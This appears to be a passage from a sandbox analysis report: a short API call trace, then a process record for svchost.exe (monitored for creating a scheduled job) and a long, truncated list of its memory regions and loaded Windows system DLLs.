[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x0
[0240.630] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.630] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.630] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.630] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.630] free (_Block=0x22081a8)
[0240.630] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x74210000"
os_pid = "0x3e4"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d383" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1369
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1370
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1371
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1372
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1373
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1374
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1375
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1376
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1377
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1378
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1379
start_va = 0x7ff600a40000
end_va = 0x7ff600a4cfff
monitored = 0
entry_point = 0x7ff600a43980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1380
start_va = 0x7ff9fbe10000
end_va = 0x7ff9fbfd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1498
start_va = 0x400000
end_va = 0x586fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1499
start_va = 0x590000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1500
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1501
start_va = 0x7ff9f9c60000
end_va = 0x7ff9f9d0cfff
monitored = 0
entry_point = 0x7ff9f9c781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1502
start_va = 0x7ff9f8d90000
end_va = 0x7ff9f8f77fff
monitored = 0
entry_point = 0x7ff9f8dbba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1503
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1504
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1505
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1506
start_va = 0x7ff9fa1d0000
end_va = 0x7ff9fa22afff
monitored = 0
entry_point = 0x7ff9fa1e38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1507
start_va = 0x7ff9fa230000
end_va = 0x7ff9fa34bfff
monitored = 0
entry_point = 0x7ff9fa2702b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1508
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1509
start_va = 0x580000
end_va = 0x586fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 1510
start_va = 0x7ff9f75d0000
end_va = 0x7ff9f76c3fff
monitored = 0
entry_point = 0x7ff9f75da960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1511
start_va = 0x7ff9f9ee0000
end_va = 0x7ff9fa15cfff
monitored = 0
entry_point = 0x7ff9f9fb4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1512
start_va = 0x7ff9f9410000
end_va = 0x7ff9f94acfff
monitored = 0
entry_point = 0x7ff9f94178a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1513
start_va = 0x7ff9f8600000
end_va = 0x7ff9f8669fff
monitored = 0
entry_point = 0x7ff9f8636d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1514
start_va = 0x700000
end_va = 0x826fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1515
start_va = 0x830000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 1516
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1517
start_va = 0x480000
end_va = 0x55cfff
monitored = 0
entry_point = 0x4de0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1518
start_va = 0x7ff9f8450000
end_va = 0x7ff9f845efff
monitored = 0
entry_point = 0x7ff9f8453210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1519
start_va = 0x7ff9f9a40000
end_va = 0x7ff9f9b95fff
monitored = 0
entry_point = 0x7ff9f9a4a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1520
start_va = 0x7ff9fba70000
end_va = 0x7ff9fbbf5fff
monitored = 0
entry_point = 0x7ff9fbabffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1521
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1522
start_va = 0xa00000
end_va = 0xb87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 1523
start_va = 0xb90000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b90000"
filename = ""
Region:
id = 1524
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1525
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1526
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1527
start_va = 0xd20000
end_va = 0xe56fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d20000"
filename = ""
Region:
id = 1528
start_va = 0xe60000
end_va = 0x105ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e60000"
filename = ""
Region:
id = 1529
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1530
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1531
start_va = 0x820000
end_va = 0x826fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 1532
start_va = 0xd20000
end_va = 0xe1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d20000"
filename = ""
Region:
id = 1533
start_va = 0xe50000
end_va = 0xe56fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e50000"
filename = ""
Region:
id = 1534
start_va = 0x7ff9f2b00000
end_va = 0x7ff9f2c4cfff
monitored = 0
entry_point = 0x7ff9f2b43da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1535
start_va = 0x7ff9f70e0000
end_va = 0x7ff9f70ebfff
monitored = 0
entry_point = 0x7ff9f70e2480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1536
start_va = 0x7ff9f2ae0000
end_va = 0x7ff9f2af7fff
monitored = 0
entry_point = 0x7ff9f2ae5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1537
start_va = 0x7ff9f2ad0000
end_va = 0x7ff9f2adafff
monitored = 0
entry_point = 0x7ff9f2ad1770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1538
start_va = 0x7ff9f4cf0000
end_va = 0x7ff9f4d81fff
monitored = 0
entry_point = 0x7ff9f4d3a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1539
start_va = 0x7ff9f2950000
end_va = 0x7ff9f2acbfff
monitored = 0
entry_point = 0x7ff9f29a1650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1540
start_va = 0x7ff9f94b0000
end_va = 0x7ff9f9570fff
monitored = 0
entry_point = 0x7ff9f94d0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1541
start_va = 0x7ff9f8460000
end_va = 0x7ff9f84aafff
monitored = 0
entry_point = 0x7ff9f84635f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1542
start_va = 0x7ff9f9bb0000
end_va = 0x7ff9f9c56fff
monitored = 0
entry_point = 0x7ff9f9bc58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1543
start_va = 0x7ff9f9040000
end_va = 0x7ff9f9206fff
monitored = 0
entry_point = 0x7ff9f909db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1544
start_va = 0x7ff9f84b0000
end_va = 0x7ff9f84bffff
monitored = 0
entry_point = 0x7ff9f84b56e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1545
start_va = 0x7ff9f99b0000
end_va = 0x7ff9f9a1afff
monitored = 0
entry_point = 0x7ff9f99c90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1546
start_va = 0x7ff9f6ce0000
end_va = 0x7ff9f6d1ffff
monitored = 0
entry_point = 0x7ff9f6cf1960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1547
start_va = 0x7ff9f28e0000
end_va = 0x7ff9f2940fff
monitored = 0
entry_point = 0x7ff9f28e4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1548
start_va = 0x7ff9f2810000
end_va = 0x7ff9f28d7fff
monitored = 0
entry_point = 0x7ff9f28513f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1549
start_va = 0x7ff9f4ea0000
end_va = 0x7ff9f4ed5fff
monitored = 0
entry_point = 0x7ff9f4eb0070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1550
start_va = 0x1000000
end_va = 0x1142fff
monitored = 0
entry_point = 0x1028210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1551
start_va = 0x830000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 1552
start_va = 0x7ff9f2620000
end_va = 0x7ff9f2629fff
monitored = 0
entry_point = 0x7ff9f2621660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1553
start_va = 0x1000000
end_va = 0x1166fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 1554
start_va = 0x1170000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001170000"
filename = ""
Region:
id = 1555
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 1556
start_va = 0x1000000
end_va = 0x10dcfff
monitored = 0
entry_point = 0x105e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1557
start_va = 0x1160000
end_va = 0x1166fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001160000"
filename = ""
Region:
id = 1558
start_va = 0x1000000
end_va = 0x10fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 1559
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 1560
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 1561
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1562
start_va = 0x7ff9f9210000
end_va = 0x7ff9f92b6fff
monitored = 0
entry_point = 0x7ff9f921b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1563
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1564
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 1565
start_va = 0x1600000
end_va = 0x1936fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1566
start_va = 0x7ff9f2600000
end_va = 0x7ff9f261ffff
monitored = 0
entry_point = 0x7ff9f26039a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1567
start_va = 0x7ff9fa350000
end_va = 0x7ff9fb8aefff
monitored = 0
entry_point = 0x7ff9fa4b11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1568
start_va = 0x7ff9f8670000
end_va = 0x7ff9f86b2fff
monitored = 0
entry_point = 0x7ff9f8684b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1569
start_va = 0x7ff9f8740000
end_va = 0x7ff9f8d83fff
monitored = 0
entry_point = 0x7ff9f89064b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1570
start_va = 0x7ff9fbc00000
end_va = 0x7ff9fbc51fff
monitored = 0
entry_point = 0x7ff9fbc0f530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1571
start_va = 0x7ff9f8f80000
end_va = 0x7ff9f9034fff
monitored = 0
entry_point = 0x7ff9f8fc22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1572
start_va = 0x7ff9f8430000
end_va = 0x7ff9f8443fff
monitored = 0
entry_point = 0x7ff9f84352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1573
start_va = 0x7ff9f7bf0000
end_va = 0x7ff9f7c0efff
monitored = 0
entry_point = 0x7ff9f7bf5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1574
start_va = 0x7ff9f6e50000
end_va = 0x7ff9f6e76fff
monitored = 0
entry_point = 0x7ff9f6e57940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1575
start_va = 0x7ff9f25f0000
end_va = 0x7ff9f25fbfff
monitored = 0
entry_point = 0x7ff9f25f14d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1576
start_va = 0x540000
end_va = 0x540fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 1577
start_va = 0x7ff9f25b0000
end_va = 0x7ff9f25e6fff
monitored = 0
entry_point = 0x7ff9f25b6020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1578
start_va = 0x7ff9f2550000
end_va = 0x7ff9f25a4fff
monitored = 0
entry_point = 0x7ff9f2553fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1579
start_va = 0x7ff9f2490000
end_va = 0x7ff9f254efff
monitored = 0
entry_point = 0x7ff9f24b1c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1580
start_va = 0x1940000
end_va = 0x1a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 1581
start_va = 0x7ff9f2390000
end_va = 0x7ff9f248bfff
monitored = 0
entry_point = 0x7ff9f23c6df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1582
start_va = 0x7ff9f2340000
end_va = 0x7ff9f2380fff
monitored = 0
entry_point = 0x7ff9f2357eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1583
start_va = 0x1a40000
end_va = 0x1b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a40000"
filename = ""
Region:
id = 1584
start_va = 0x7ff9f82a0000
end_va = 0x7ff9f82b8fff
monitored = 0
entry_point = 0x7ff9f82a5e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1585
start_va = 0x700000
end_va = 0x806fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1586
start_va = 0x1b40000
end_va = 0x1d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b40000"
filename = ""
Region:
id = 1587
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 1590
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1591
start_va = 0x7ff9f7730000
end_va = 0x7ff9f7778fff
monitored = 0
entry_point = 0x7ff9f773a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1592
start_va = 0x7ff9f2320000
end_va = 0x7ff9f2330fff
monitored = 0
entry_point = 0x7ff9f2323320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1593
start_va = 0x7ff9f8110000
end_va = 0x7ff9f813cfff
monitored = 0
entry_point = 0x7ff9f8129d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1594
start_va = 0x7ff9f2300000
end_va = 0x7ff9f2319fff
monitored = 0
entry_point = 0x7ff9f2302cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1595
start_va = 0x7ff9f92c0000
end_va = 0x7ff9f9402fff
monitored = 0
entry_point = 0x7ff9f92e8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1596
start_va = 0x7ff9f82c0000
end_va = 0x7ff9f82e8fff
monitored = 0
entry_point = 0x7ff9f82d4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1597
start_va = 0x700000
end_va = 0x77ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1598
start_va = 0x800000
end_va = 0x806fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 1599
start_va = 0x7ff9f20d0000
end_va = 0x7ff9f213dfff
monitored = 0
entry_point = 0x7ff9f20d7f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1600
start_va = 0x7ff9f20b0000
end_va = 0x7ff9f20c0fff
monitored = 0
entry_point = 0x7ff9f20b7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1601
start_va = 0x7ff9f2080000
end_va = 0x7ff9f20a4fff
monitored = 0
entry_point = 0x7ff9f2092f20
region_type = mapped_file
name = "wificonnapi.dll"
